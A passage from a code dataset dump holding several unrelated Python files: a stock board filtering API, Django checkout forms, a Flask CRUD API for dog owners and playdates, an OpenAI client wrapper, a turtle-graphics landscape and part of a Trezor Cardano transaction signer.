\"\"\"针对行业板块与概念板块的联合筛选\n\n Args:\n industry: 返回代码必须包含在这些行业板块内\n with_concepts: 返回代码必须包含在这些概念内\n without: 返回代码必须不在这些概念内\n\n Returns:\n 股票代码列表\n \"\"\"\n if with_concepts is not None:\n cb = ConceptBoard()\n cb.init()\n\n if isinstance(with_concepts, str):\n with_concepts = [with_concepts]\n\n if isinstance(without, str):\n without = [without]\n concepts_codes = set(cb.filter(with_concepts, without=without))\n else:\n concepts_codes = None\n\n codes = None\n if industry is not None:\n ib = IndustryBoard()\n ib.init()\n\n codes = ib.filter([industry])\n if codes is not None:\n codes = set(codes)\n else:\n codes = None\n\n final_results = []\n if codes is None or concepts_codes is None:\n final_results = codes or concepts_codes\n else:\n final_results = codes.intersection(concepts_codes)\n\n return final_results\n\n\ndef filter(industry=None, with_concepts: Optional[List[str]] = None, without=[]):\n if industry is not None and isinstance(industry, int):\n industry = str(industry)\n\n if with_concepts is not None and isinstance(with_concepts, list):\n with_concepts = [str(item) for item in with_concepts]\n elif isinstance(with_concepts, str):\n with_concepts = re.split(r\"[,,]\", with_concepts)\n\n if without is not None and isinstance(without, list):\n without = [str(item) for item in without]\n elif isinstance(without, str):\n without = re.split(r\"[,,]\", without)\n\n results = combined_filter(industry, 
with_concepts, without)\n\n if industry is None:\n board = IndustryBoard()\n board.init()\n else:\n board = ConceptBoard()\n board.init()\n\n for code in results:\n name = board.get_stock_alias(code)\n print(code, name)\n\n\ndef list_boards(sub: str):\n result = []\n\n if sub == \"concept\":\n cb = ConceptBoard()\n for i, (_, name, code, count) in enumerate(cb.boards):\n result.append((code, name, count.item()))\n elif sub == \"industry\":\n ib = IndustryBoard()\n for i, (name, code, count) in enumerate(ib.boards):\n result.append((code, name, count.item()))\n\n return result\n\n\ndef board_fuzzy_match(board_type: str, pattern: str):\n if board_type == \"industry\":\n handler = IndustryBoard()\n else:\n handler = ConceptBoard()\n\n codes = handler.fuzzy_match_board_name(pattern)\n if not codes:\n return []\n\n results = []\n for _item in codes:\n _name = handler.get_name(_item)\n if not _name:\n continue\n results.append(f\"{_item} {_name}\")\n\n return results\n\n\ndef get_board_info_by_id(board_type: str, board_id: str, _mode: int = 0):\n if board_type == \"industry\":\n handler = IndustryBoard()\n else:\n handler = ConceptBoard()\n\n _info = handler.get_board_info(board_id)\n if not _info:\n return {}\n\n if _mode == 0:\n return {\"code\": board_id, \"name\": _info[0], \"stocks\": _info[1].item()}\n\n _list = handler.get_members(board_id, with_name=True)\n if not _list:\n return {\"code\": board_id, \"name\": _info[0], \"stocks\": _info[1].item()}\n else:\n return {\"code\": board_id, \"name\": _info[0], \"stocks\": _list}\n\n\ndef get_boards_by_sec(board_type: str, security: str):\n if board_type == \"industry\":\n handler = IndustryBoard()\n else:\n handler = ConceptBoard()\n\n bl = handler.get_boards(security)\n if len(bl) == 0:\n return []\n\n result = []\n for board_id in bl:\n _info = handler.get_board_info(board_id)\n if not _info:\n continue\n result.append({\"code\": board_id, \"name\": _info[0], \"stocks\": _info[1].item()})\n\n return result\n\n\ndef board_filter_members(\n board_type: str, included: List[str], excluded: List[str] = []\n):\n if board_type == \"industry\":\n handler = IndustryBoard()\n else:\n handler = ConceptBoard()\n\n codes = handler.filter(included, without=excluded)\n if not codes:\n return []\n\n stock_list = []\n for _item in codes:\n _stock_name = GlobalStockInfo.get_stock_name(_item)\n if not _stock_name: # 退市或者北交所的股票忽略\n continue\n stock_list.append([_item, _stock_name])\n\n return stock_list\n\n\nasync def get_board_bars_bycount(board_id: str, dt_end: datetime.date, n_bars: int):\n now = datetime.datetime.now()\n if not TimeFrame.is_trade_day(now):\n dt = TimeFrame.day_shift(now, 0)\n else:\n dt = now.date()\n\n # 为了计算MA250,取250+60根\n _end = dt_end\n if _end > dt:\n _end = dt\n if n_bars >= 120: # 约定最大n_bars为250\n _start = TimeFrame.shift(_end, -310, FrameType.DAY)\n else:\n _start = TimeFrame.shift(_end, -n_bars - 30, FrameType.DAY)\n\n board_info = {}\n sec_data = await Board.get_bars_in_range(board_id, _start, _end)\n if len(sec_data) == 0:\n return board_info\n\n ma_list = await calculate_ma_list(sec_data, more_data=True)\n rsi_list = await calculate_rsi_list(sec_data)\n ma_list[\"rsi6\"] = rsi_list\n\n # 只取最后120个节点\n for _key in ma_list:\n _raw_data = ma_list[_key]\n _count = len(_raw_data)\n if _count > n_bars:\n ma_list[_key] = _raw_data[_count - n_bars :]\n\n k_bars = []\n for item in sec_data:\n _date = item[\"frame\"].item()\n _data = {\n \"frame\": _date.strftime(\"%Y-%m-%d %H:%M:%S\"),\n \"data\": [\n math_round(item[\"open\"].item(), 
2),\n                math_round(item[\"close\"].item(), 2),\n                math_round(item[\"low\"].item(), 2),\n                math_round(item[\"high\"].item(), 2),\n                math_round(item[\"volume\"].item() / 100, 0),\n                math_round(item[\"amount\"].item() / 10000, 0),\n            ],\n        }\n        k_bars.append(_data)\n    _count = len(k_bars)\n    if _count > n_bars:\n        board_info[\"bars\"] = k_bars[_count - n_bars :]\n    else:\n        board_info[\"bars\"] = k_bars\n    board_info.update(ma_list)\n\n    return board_info\n","repo_name":"zillionare/omega","sub_path":"omega/boards/webapi.py","file_name":"webapi.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"}
{"seq_id":"69799614200","text":"from django import forms\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\nfrom oscar.apps.checkout.forms import ShippingAddressForm as OldShippingAddressForm\nfrom oscar.core.loading import get_model\n\nVOLGA_CITIES = [\n    ('Волжский', 'Волжский'),\n    ('Волгоград', 'Волгоград'),\n    ('Средняя Ахтуба', 'Средняя Ахтуба'), \n    ('Краснослободск', 'Краснослободск'),\n]\n\nclass ShippingAddressForm(OldShippingAddressForm):\n\n    class Meta: \n        model = get_model('order', 'shippingaddress')\n        fields = [\n            'first_name', 'last_name', #'title',\n            'line1', 'line2', #'line3', #'line4',\n            'state', \n            'postcode', 'country',\n            'phone_number', 'notes',\n        ]\n        labels = {\n            'first_name': 'Имя и Отчество (при наличии)',\n            'state': 'Город',\n            # 'title': 'Отчество (при наличии)',\n            # 'line1': 'Отчество (при наличии)',\n            # 'line2': 'Первая строка адреса', \n            # 'line3': 'Вторая строка адреса', \n        }\n        widgets = {\n            'state': forms.Select(choices=VOLGA_CITIES),\n            'title': forms.TextInput(attrs={'maxlength':50}),\n        }\n\n\nclass PaymentMethodForm(forms.Form):\n    \"\"\"\n    Extra form for the custom payment method.\n    \"\"\"\n    payment_method = forms.ChoiceField(\n        label=_(\"Выберите способ оплаты\"),\n        choices=settings.OSCAR_PAYMENT_METHODS,\n        widget=forms.RadioSelect()\n    )\n\n\n    def get_payment_method_display(payment_method):\n        return dict(settings.OSCAR_PAYMENT_METHODS).get(payment_method)","repo_name":"eximius8/vlzb","sub_path":"myapps/checkout/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"30273182909","text":"\"\"\"\nThis module takes care of starting the API Server, Loading the DB and Adding the endpoints\n\"\"\"\nfrom flask import Flask, request, jsonify, url_for, Blueprint\nfrom api.models import db, Owner, Dogs, Breeds, Playdates, Message\nfrom api.utils import generate_sitemap, APIException\n\napi = Blueprint('api', __name__)\n\n\n@api.route('/owner', methods=['POST'])\ndef handle_owner():\n    request_body = request.get_json()\n    # owner=Owner.query.get(request_body['name'])\n    new_owner=Owner(\n        name=request_body['name'],\n        img_url = request_body['img_url'],\n        zipcode = request_body['zipcode'],\n        email = request_body['email'],\n        password = request_body['password'],)\n    db.session.add(new_owner)\n    db.session.commit()\n    return jsonify(new_owner.serialize()), 200\n@api.route('/owner/<int:owner_id>', methods=['GET'])\ndef get_owner(owner_id):\n    owner = Owner.query.get(owner_id)\n    if owner is None:\n        return jsonify({'message': 'Owner not found'}), 404\n    return jsonify(owner.serialize()), 200\n\n@api.route('/owners', methods=['GET'])\ndef get_all_owner():\n    owner_list = Owner.query.all()\n    owner_serialized = [owner.serialize() for owner in owner_list]\n    if owner_list is 
None:\n        return jsonify({'message': 'Owner not found'}), 404\n    return jsonify(owner_serialized), 200\n\n@api.route('/owner/<int:owner_id>', methods=['PUT'])\ndef update_owner(owner_id):\n    owner = Owner.query.get(owner_id)\n    if owner is None:\n        return jsonify({'message': 'Owner not found'}), 404\n    request_body = request.get_json()\n    owner.name = request_body.get('name', owner.name)\n    owner.img_url = request_body.get('img_url', owner.img_url)\n    owner.zipcode = request_body.get('zipcode', owner.zipcode)\n    owner.email = request_body.get('email', owner.email)\n    owner.password = request_body.get('password', owner.password)\n    db.session.commit()\n    return jsonify(owner.serialize()), 200\n    \n@api.route('/owner/<int:id>', methods=['DELETE'])\ndef delete_owner(id):\n    owner = Owner.query.get(id)\n    if owner is None:\n        raise APIException(\"Owner not found\", 404)\n    db.session.delete(owner)\n    db.session.commit()\n    return jsonify({'message': f'Owner{owner.id} was deleted'}), 201\n    \n\n# DOGS LINE START HERE\n@api.route('/dogs', methods=['POST'])\ndef handle_dogs():\n    request_body = request.get_json()\n    new_dog=Dogs(\n        name=request_body['name'],\n        img_url=request_body['img_url'],\n        breed=request_body['breed'],\n        chip_number=request_body['chip_number'],\n        weight=request_body['weight'],\n        neutered_or_spayed=request_body['neutered_or_spayed'],\n        dog_id=request_body['dog_id'],)\n    db.session.add(new_dog)\n    db.session.commit()\n    return jsonify(new_dog.serialize()), 200\n\n@api.route('/dogs', methods=['GET'])\ndef get_all_dogs():\n    dogs_list = Dogs.query.all()\n    dogs_serialized = [dogs.serialize() for dogs in dogs_list]\n    if dogs_list is None:\n        return jsonify({'message': 'Dogs not found'}), 404\n    return jsonify(dogs_serialized), 200\n\n@api.route('/dogs/<int:dog_id>', methods=['GET'])\ndef get_dog(dog_id):\n    dog = Dogs.query.get(dog_id)\n    if dog is None:\n        return jsonify({'message': 'Dog not found'}), 404\n    return jsonify(dog.serialize()), 200\n\n@api.route('/dogs/<int:dog_id>', methods=['PUT'])\ndef update_dog(dog_id):\n    dog = Dogs.query.get(dog_id)\n    if dog is None:\n        return jsonify({'message': 'Dog not found'}), 404\n    request_body = request.get_json()\n    dog.name = request_body.get('name', dog.name)\n    dog.img_url = request_body.get('img_url', dog.img_url)\n    dog.breed = request_body.get('breed', dog.breed)\n    dog.chip_number = request_body.get('chip_number', dog.chip_number)\n    dog.weight = request_body.get('weight', dog.weight)\n    dog.neutered_or_spayed = request_body.get('neutered_or_spayed', dog.neutered_or_spayed)\n    db.session.commit()\n    return jsonify(dog.serialize()), 200\n    \n@api.route('/dogs/<int:id>', methods=['DELETE'])\ndef delete_dog(id):\n    dog = Dogs.query.get(id)\n    if dog is None:\n        raise APIException(\"Dog not found\", 404)\n    db.session.delete(dog)\n    db.session.commit()\n    return jsonify({'message': f'Dogs{dog.id} was deleted'}), 201\n\n# BREEDS LINE START HERE\n@api.route('/breeds', methods=['POST'])\ndef handle_breeds():\n    request_body = request.get_json()\n    new_breeds=Breeds(\n        name=request_body['name'],\n        img_url = request_body['img_url'],)\n    db.session.add(new_breeds)\n    db.session.commit()\n    return jsonify(new_breeds.serialize()), 200\n\n@api.route('/breeds/<int:breeds_id>', methods=['GET'])\ndef get_breeds(breeds_id):\n    breeds = Breeds.query.get(breeds_id)\n    if breeds is None:\n        return jsonify({'message': 'Breeds not found'}), 404\n    return jsonify(breeds.serialize()), 200\n\n@api.route('/breeds/<int:breeds_id>', methods=['PUT'])\ndef update_breeds(breeds_id):\n    breeds = Breeds.query.get(breeds_id)\n    if breeds is None:\n        
return jsonify({'message': 'Breeds not found'}), 404\n    request_body = request.get_json()\n    breeds.name = request_body.get('name', breeds.name)\n    breeds.img_url = request_body.get('img_url', breeds.img_url)\n    db.session.commit()\n    return jsonify(breeds.serialize()), 200\n    \n@api.route('/breeds/<int:id>', methods=['DELETE'])\ndef delete_breeds(id):\n    breeds = Breeds.query.get(id)\n    if breeds is None:\n        raise APIException(\"Breeds not found\", 404)\n    db.session.delete(breeds)\n    db.session.commit()\n    return jsonify({'message': f'breeds{breeds.id} was deleted'}), 201\n\n# PLAYDATES LINE START HERE\n@api.route('/playdates' , methods=['POST'])\ndef handle_playdates():\n    # the view must not shadow the imported Playdates model\n    request_body = request.get_json()\n    # owner=Owner.query.get(request_body['name'])\n    new_playdate=Playdates(\n        owner1_id=request_body['owner1_id'],\n        owner2_id = request_body['owner2_id'],\n        messages = request_body['messages'],)\n    db.session.add(new_playdate)\n    db.session.commit()\n    return jsonify(new_playdate.serialize()), 200\n\n@api.route('/playdates/<int:playdates_id>' , methods=['GET'])\ndef get_playdates(playdates_id):\n    playdates = Playdates.query.get(playdates_id)\n    if playdates is None:\n        return jsonify({'message': 'playdates not found'}), 404\n    return jsonify(playdates.serialize()), 200\n\n\n@api.route('/playdates/<int:playdates_id>', methods=['PUT'])\ndef update_playdates_id(playdates_id):\n    playdates = Playdates.query.get(playdates_id)\n    if playdates is None:\n        return jsonify({'message': 'playdates not found'}), 404\n    request_body = request.get_json()\n    playdates.owner1_id = request_body.get('owner1_id', playdates.owner1_id)\n    playdates.owner2_id = request_body.get('owner2_id', playdates.owner2_id)\n    playdates.messages = request_body.get('messages', playdates.messages)\n    db.session.commit()\n    return jsonify(playdates.serialize()), 200\n\n@api.route('/playdates/<int:id>', methods=['DELETE'])\ndef delete_playdates(id):\n    playdates = Playdates.query.get(id)\n    if playdates is None:\n        raise APIException(\"playdates not found\", 404)\n    db.session.delete(playdates)\n    db.session.commit()\n    return jsonify({'message': f'playdates{playdates.id} was deleted'}), 201","repo_name":"OVYEDDeno/barkpals","sub_path":"src/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"7745484699","text":"import openai\nfrom bytedance import servicediscovery\nimport random\n\n\nclass APIWrapper:\n    def __init__(self, PSM=\"P.S.M\", DC=None) -> None:\n        self.PSM = PSM\n        if DC is not None:\n            self.PSM += f\".service.{DC}\"\n\n    def get_api_base(self):\n        instances = servicediscovery.lookup(self.PSM)\n        weighted_instances = []\n        for instance in instances:\n            weight = int(instance['Tags'].get('weight', 1))\n            weighted_instances.extend([instance] * weight)\n        instance = random.choice(weighted_instances)\n        return f\"http://{instance['Host']}:{instance['Port']}/v1\"\n\n    def __str__(self):\n        return self.get_api_base()\n\n\ndef hook_openai(PSM=\"yangxinyu.715.infer\", DC=\"lq\"):\n    import openai\n    openai.api_base = APIWrapper(PSM=PSM, DC=DC)\n    openai.api_key = \"---\"\n\n\nhook_openai()\nmodel = \"baichuan-7b\"\n\n\ndef test_completion(prompt=\"Once upon a time,\"):\n    completion = openai.Completion.create(model=model, prompt=prompt, max_tokens=64)\n    print(prompt + completion.choices[0].text)\n\n\ndef test_embedding():\n    embedding = openai.Embedding.create(model=model, input=\"Hello world!\")\n    
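# the proxied endpoint is assumed to mirror OpenAI's response schema:\n    # data[0][\"embedding\"] holds the vector whose length is printed below\n    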
print(len(embedding[\"data\"][0][\"embedding\"]))\n\n\nif __name__ == \"__main__\":\n test_completion()\n test_embedding()","repo_name":"tzh476/transformer_demo","sub_path":"baichuan.py","file_name":"baichuan.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36821466054","text":"import turtle\r\nimport random\r\nimport Shapes as shapes\r\nimport Formations as nature\r\nimport Backdrop as backing\r\nfrom House import house\r\nfrom Gradient import gradient\r\n\r\nframe_width = int(800)\r\nframe_height = int(500)\r\nground_width = 100\r\n\r\nturtle.setup(frame_width, frame_height, 250, 50)\r\n\r\nturtle.speed(0)\r\n# Background\r\nturtle.penup()\r\n\r\nturtle.setposition(-frame_width/2, (-frame_height/2)) # Backdrop\r\nshapes.rect(frame_width, frame_height, '110, 160, 230', 180)\r\nturtle.setposition(0, 0)\r\nturtle.penup()\r\n\r\nbacking.back_mount(frame_width, frame_height/1.75, frame_height, '165, 120, 230') # Hills\r\nbacking.back_mount(frame_width, frame_height/2.2, frame_height, '151, 90, 236')\r\nbacking.back_mount(frame_width, frame_height/2.75, frame_height, '137, 60, 242')\r\nbacking.back_mount(frame_width, frame_height/3.2, frame_height, '123, 30, 248')\r\nbacking.back_mount(frame_width, frame_height/3.5, frame_height, '110, 0, 255')\r\n\r\nturtle.setposition(frame_width/2, -frame_height/2) # Grass\r\ngradient(ground_width, frame_height*2, '67, 255, 49', '67, 155, 49', 90)\r\n# shapes.rect(frame_width, ground_width, '67, 255, 49', 180)\r\n\r\nturtle.setposition(0, 0)\r\n\r\nturtle.setposition(150, -150)\r\nnature.mountain(150, 150, 0, 3)\r\n\r\nturtle.setposition(-150, -150)\r\nnature.mountain(200, 200, 0, 2)\r\n\r\nturtle.setposition(0, -150)\r\nnature.mountain(350, 300, 0, 1)\r\n\r\nturtle.setheading(180)\r\nturtle.forward(300)\r\nturtle.setheading(270)\r\nturtle.forward(220)\r\n\r\nhouse(70, 60, 'brown', 0)\r\n\r\nturtle.setheading(0)\r\nturtle.forward(150)\r\n\r\nnature.tree(40, 30, 60, 80, 3, 30)\r\n\r\nturtle.setheading(270)\r\nturtle.forward(130)\r\nturtle.setheading(0 - 3)\r\nturtle.forward(150)\r\nnature.tree(40, 30, 60, 80, 3, 30)\r\n\r\nturtle.setheading(270)\r\nturtle.forward(130)\r\nturtle.setheading(0 + 7)\r\nturtle.forward(150)\r\nnature.tree(40, 30, 60, 80, 3, 30)\r\n\r\nturtle.setheading(270)\r\nturtle.forward(130)\r\nturtle.setheading(0 - 2)\r\nturtle.forward(150)\r\nnature.tree(40, 30, 60, 80, 3, 30)\r\n\r\n\r\n\"\"\"\r\nfor x in range(10):\r\n turtle.setposition(random.randint(-frame_width/2, frame_width/2), random.randint(-frame_height/2 + 100, frame_height/2))\r\n snowflake(3, 2, 'white')\r\n \r\n \"\"\"\r\n\r\nturtle.hideturtle()\r\nturtle.mainloop()","repo_name":"Ethan-Leone-9134/pythonProjects","sub_path":"turtleStuff/landscapes/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36036454110","text":"from micropython import const\nfrom typing import TYPE_CHECKING\n\nfrom trezor import messages\nfrom trezor.enums import (\n CardanoCertificateType,\n CardanoTxOutputSerializationFormat,\n CardanoTxWitnessType,\n)\nfrom trezor.messages import CardanoTxItemAck, CardanoTxOutput\nfrom trezor.wire import DataError, ProcessError\nfrom trezor.wire.context import call as ctx_call\n\nfrom apps.common import safety_checks\n\nfrom .. 
import addresses, certificates, layout, seed\nfrom ..helpers import INPUT_PREV_HASH_SIZE, LOVELACE_MAX_SUPPLY\nfrom ..helpers.credential import Credential\nfrom ..helpers.hash_builder_collection import HashBuilderDict, HashBuilderList\nfrom ..helpers.paths import SCHEMA_STAKING\nfrom ..helpers.utils import derive_public_key\n\nif TYPE_CHECKING:\n from typing import Any, Awaitable, ClassVar\n\n from trezor.enums import CardanoAddressType\n\n from apps.common import cbor\n from apps.common.paths import PathSchema\n\n from ..helpers.hash_builder_collection import HashBuilderEmbeddedCBOR\n\n CardanoTxResponseType = CardanoTxItemAck | messages.CardanoTxWitnessResponse\n\n_MINTING_POLICY_ID_LENGTH = const(28)\n_MAX_ASSET_NAME_LENGTH = const(32)\n\n_TX_BODY_KEY_INPUTS = const(0)\n_TX_BODY_KEY_OUTPUTS = const(1)\n_TX_BODY_KEY_FEE = const(2)\n_TX_BODY_KEY_TTL = const(3)\n_TX_BODY_KEY_CERTIFICATES = const(4)\n_TX_BODY_KEY_WITHDRAWALS = const(5)\n_TX_BODY_KEY_AUXILIARY_DATA = const(7)\n_TX_BODY_KEY_VALIDITY_INTERVAL_START = const(8)\n_TX_BODY_KEY_MINT = const(9)\n_TX_BODY_KEY_SCRIPT_DATA_HASH = const(11)\n_TX_BODY_KEY_COLLATERAL_INPUTS = const(13)\n_TX_BODY_KEY_REQUIRED_SIGNERS = const(14)\n_TX_BODY_KEY_NETWORK_ID = const(15)\n_TX_BODY_KEY_COLLATERAL_RETURN = const(16)\n_TX_BODY_KEY_TOTAL_COLLATERAL = const(17)\n_TX_BODY_KEY_REFERENCE_INPUTS = const(18)\n\n_BABBAGE_OUTPUT_KEY_ADDRESS = const(0)\n_BABBAGE_OUTPUT_KEY_AMOUNT = const(1)\n_BABBAGE_OUTPUT_KEY_DATUM_OPTION = const(2)\n_BABBAGE_OUTPUT_KEY_REFERENCE_SCRIPT = const(3)\n\n_DATUM_OPTION_KEY_HASH = const(0)\n_DATUM_OPTION_KEY_INLINE = const(1)\n\n_POOL_REGISTRATION_CERTIFICATE_ITEMS_COUNT = const(10)\n\n_MAX_CHUNK_SIZE = const(1024)\n\n\nclass Signer:\n \"\"\"\n This class encapsulates the entire tx signing process. By default, most tx items are\n allowed and shown to the user. For each signing mode, there is a subclass that\n overrides some methods, usually to add more validation rules and show/hide some\n items. 
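The tx body is hashed\n    incrementally (blake2b-256) as items stream in, so the whole tx never has to\n    be held in memory at once. 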
Each tx item is processed in a _process_xyz() method which handles validation,\n user confirmation and serialization of the tx item.\n \"\"\"\n\n SIGNING_MODE_TITLE: ClassVar[str]\n\n def __init__(\n self,\n msg: messages.CardanoSignTxInit,\n keychain: seed.Keychain,\n ) -> None:\n from ..helpers.account_path_check import AccountPathChecker\n\n self.msg = msg\n self.keychain = keychain\n\n self.account_path_checker = AccountPathChecker()\n\n # There should be at most one pool owner given as a path.\n self.pool_owner_path = None\n\n # Inputs, outputs and fee are mandatory, count the number of optional fields present.\n tx_dict_items_count = 3 + sum(\n (\n msg.ttl is not None,\n msg.certificates_count > 0,\n msg.withdrawals_count > 0,\n msg.has_auxiliary_data,\n msg.validity_interval_start is not None,\n msg.minting_asset_groups_count > 0,\n msg.include_network_id,\n msg.script_data_hash is not None,\n msg.collateral_inputs_count > 0,\n msg.required_signers_count > 0,\n msg.has_collateral_return,\n msg.total_collateral is not None,\n msg.reference_inputs_count > 0,\n )\n )\n self.tx_dict: HashBuilderDict[int, Any] = HashBuilderDict(\n tx_dict_items_count, ProcessError(\"Invalid tx signing request\")\n )\n\n self.should_show_details = False\n\n async def sign(self) -> None:\n from trezor.crypto import hashlib\n\n hash_fn = hashlib.blake2b(outlen=32)\n self.tx_dict.start(hash_fn)\n with self.tx_dict:\n await self._processs_tx_init()\n\n tx_hash = hash_fn.digest()\n await self._confirm_tx(tx_hash)\n\n response_after_witness_requests = await self._process_witness_requests(tx_hash)\n await ctx_call(response_after_witness_requests, messages.CardanoTxHostAck)\n await ctx_call(\n messages.CardanoTxBodyHash(tx_hash=tx_hash), messages.CardanoTxHostAck\n )\n\n # signing request\n\n async def _processs_tx_init(self) -> None:\n self._validate_tx_init()\n await self._show_tx_init()\n msg = self.msg # local_cache_attribute\n add = self.tx_dict.add # local_cache_attribute\n HBL = HashBuilderList # local_cache_global\n\n inputs_list: HashBuilderList[tuple[bytes, int]] = HBL(msg.inputs_count)\n with add(_TX_BODY_KEY_INPUTS, inputs_list):\n await self._process_inputs(inputs_list)\n\n outputs_list: HashBuilderList = HBL(msg.outputs_count)\n with add(_TX_BODY_KEY_OUTPUTS, outputs_list):\n await self._process_outputs(outputs_list)\n\n add(_TX_BODY_KEY_FEE, msg.fee)\n\n if msg.ttl is not None:\n add(_TX_BODY_KEY_TTL, msg.ttl)\n\n if msg.certificates_count > 0:\n certificates_list: HashBuilderList = HBL(msg.certificates_count)\n with add(_TX_BODY_KEY_CERTIFICATES, certificates_list):\n await self._process_certificates(certificates_list)\n\n if msg.withdrawals_count > 0:\n withdrawals_dict: HashBuilderDict[bytes, int] = HashBuilderDict(\n msg.withdrawals_count, ProcessError(\"Invalid withdrawal\")\n )\n with add(_TX_BODY_KEY_WITHDRAWALS, withdrawals_dict):\n await self._process_withdrawals(withdrawals_dict)\n\n if msg.has_auxiliary_data:\n await self._process_auxiliary_data()\n\n if msg.validity_interval_start is not None:\n add(_TX_BODY_KEY_VALIDITY_INTERVAL_START, msg.validity_interval_start)\n\n if msg.minting_asset_groups_count > 0:\n minting_dict: HashBuilderDict[bytes, HashBuilderDict] = HashBuilderDict(\n msg.minting_asset_groups_count,\n ProcessError(\"Invalid mint token bundle\"),\n )\n with add(_TX_BODY_KEY_MINT, minting_dict):\n await self._process_minting(minting_dict)\n\n if msg.script_data_hash is not None:\n await self._process_script_data_hash()\n\n if msg.collateral_inputs_count > 0:\n 
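# collateral inputs back Plutus script execution (they are only consumed if\n            # script validation fails) and are serialized like ordinary inputs\n            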
collateral_inputs_list: HashBuilderList[tuple[bytes, int]] = HBL(\n msg.collateral_inputs_count\n )\n with add(_TX_BODY_KEY_COLLATERAL_INPUTS, collateral_inputs_list):\n await self._process_collateral_inputs(collateral_inputs_list)\n\n if msg.required_signers_count > 0:\n required_signers_list: HashBuilderList[bytes] = HBL(\n msg.required_signers_count\n )\n with add(_TX_BODY_KEY_REQUIRED_SIGNERS, required_signers_list):\n await self._process_required_signers(required_signers_list)\n\n if msg.include_network_id:\n add(_TX_BODY_KEY_NETWORK_ID, msg.network_id)\n\n if msg.has_collateral_return:\n await self._process_collateral_return()\n\n if msg.total_collateral is not None:\n add(_TX_BODY_KEY_TOTAL_COLLATERAL, msg.total_collateral)\n\n if msg.reference_inputs_count > 0:\n reference_inputs_list: HashBuilderList[tuple[bytes, int]] = HBL(\n msg.reference_inputs_count\n )\n with add(_TX_BODY_KEY_REFERENCE_INPUTS, reference_inputs_list):\n await self._process_reference_inputs(reference_inputs_list)\n\n def _validate_tx_init(self) -> None:\n from ..helpers.utils import validate_network_info\n\n msg = self.msg # local_cache_attribute\n\n if msg.fee > LOVELACE_MAX_SUPPLY:\n raise ProcessError(\"Fee is out of range!\")\n if (\n msg.total_collateral is not None\n and msg.total_collateral > LOVELACE_MAX_SUPPLY\n ):\n raise ProcessError(\"Total collateral is out of range!\")\n validate_network_info(msg.network_id, msg.protocol_magic)\n\n async def _show_tx_init(self) -> None:\n self.should_show_details = await layout.show_tx_init(self.SIGNING_MODE_TITLE)\n\n if not self._is_network_id_verifiable():\n await layout.warn_tx_network_unverifiable()\n\n async def _confirm_tx(self, tx_hash: bytes) -> None:\n # Final signing confirmation is handled separately in each signing mode.\n raise NotImplementedError\n\n # inputs\n\n async def _process_inputs(\n self, inputs_list: HashBuilderList[tuple[bytes, int]]\n ) -> None:\n for _ in range(self.msg.inputs_count):\n input: messages.CardanoTxInput = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxInput\n )\n self._validate_input(input)\n await self._show_input(input)\n inputs_list.append((input.prev_hash, input.prev_index))\n\n def _validate_input(self, input: messages.CardanoTxInput) -> None:\n if len(input.prev_hash) != INPUT_PREV_HASH_SIZE:\n raise ProcessError(\"Invalid input\")\n\n async def _show_input(self, input: messages.CardanoTxInput) -> None:\n # We never show the inputs, except for Plutus txs.\n pass\n\n # outputs\n\n async def _process_outputs(self, outputs_list: HashBuilderList) -> None:\n total_amount = 0\n for _ in range(self.msg.outputs_count):\n output: CardanoTxOutput = await ctx_call(\n CardanoTxItemAck(), CardanoTxOutput\n )\n await self._process_output(outputs_list, output)\n\n total_amount += output.amount\n\n if total_amount > LOVELACE_MAX_SUPPLY:\n raise ProcessError(\"Total transaction amount is out of range!\")\n\n async def _process_output(\n self, outputs_list: HashBuilderList, output: CardanoTxOutput\n ) -> None:\n self._validate_output(output)\n should_show = self._should_show_output(output)\n if should_show:\n await self._show_output_init(output)\n\n output_items_count = 2 + sum(\n (\n output.datum_hash is not None,\n output.inline_datum_size > 0,\n output.reference_script_size > 0,\n )\n )\n if output.format == CardanoTxOutputSerializationFormat.ARRAY_LEGACY:\n output_list: HashBuilderList = HashBuilderList(output_items_count)\n with outputs_list.append(output_list):\n await self._process_legacy_output(output_list, output, 
should_show)\n elif output.format == CardanoTxOutputSerializationFormat.MAP_BABBAGE:\n output_dict: HashBuilderDict[int, Any] = HashBuilderDict(\n output_items_count, ProcessError(\"Invalid output\")\n )\n with outputs_list.append(output_dict):\n await self._process_babbage_output(output_dict, output, should_show)\n else:\n raise RuntimeError # should be unreachable\n\n def _validate_output(self, output: CardanoTxOutput) -> None:\n from ..helpers import OUTPUT_DATUM_HASH_SIZE\n\n address_parameters = output.address_parameters # local_cache_attribute\n\n if address_parameters is not None and output.address is not None:\n raise ProcessError(\"Invalid output\")\n\n if address_parameters is not None:\n addresses.validate_output_address_parameters(address_parameters)\n self._fail_if_strict_and_unusual(address_parameters)\n elif output.address is not None:\n addresses.validate_output_address(\n output.address, self.msg.protocol_magic, self.msg.network_id\n )\n else:\n raise ProcessError(\"Invalid output\")\n\n # datum hash\n if output.datum_hash is not None:\n if len(output.datum_hash) != OUTPUT_DATUM_HASH_SIZE:\n raise ProcessError(\"Invalid output datum hash\")\n\n # inline datum\n if output.inline_datum_size > 0:\n if output.format != CardanoTxOutputSerializationFormat.MAP_BABBAGE:\n raise ProcessError(\"Invalid output\")\n\n # datum hash and inline datum are mutually exclusive\n if output.datum_hash is not None and output.inline_datum_size > 0:\n raise ProcessError(\"Invalid output\")\n\n # reference script\n if output.reference_script_size > 0:\n if output.format != CardanoTxOutputSerializationFormat.MAP_BABBAGE:\n raise ProcessError(\"Invalid output\")\n\n self.account_path_checker.add_output(output)\n\n async def _show_output_init(self, output: CardanoTxOutput) -> None:\n address_type = self._get_output_address_type(output)\n if (\n output.datum_hash is None\n and output.inline_datum_size == 0\n and address_type in addresses.ADDRESS_TYPES_PAYMENT_SCRIPT\n ):\n await 